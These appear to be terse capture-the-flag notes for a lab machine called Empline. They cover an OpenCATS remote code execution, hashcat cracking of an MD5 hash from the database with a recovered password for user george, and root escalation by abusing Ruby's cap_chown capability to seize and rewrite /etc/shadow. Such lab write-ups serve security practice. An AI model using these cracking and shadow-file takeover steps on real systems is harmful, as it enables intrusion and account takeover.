Empline

port 22,80,3306 running Opencats. There's a RCE

in the DB find details for george

capabilities secions highlights Ruby

// crack md5 hash
hashcat -m 0 -a 0 -o cracked.txt hash2.txt /home/kali/htb/rockyou.txt

george:pretonnevippasempre


identified ruby cap_chown+ep

getcap -r / 2>/dev/null
// ruby -c 'import os;os.chown("/etc/shadow",1002,1002)'
ruby -e 'require "fileutils"; FileUtils.chown(1002, 1002, "/etc/shadow")'
openssl passwd -1 -salt abc password
vim /etc/shadow
find / -name *flag*

PreviousInternal NextBlue (internal blue)

Last updated 2 years ago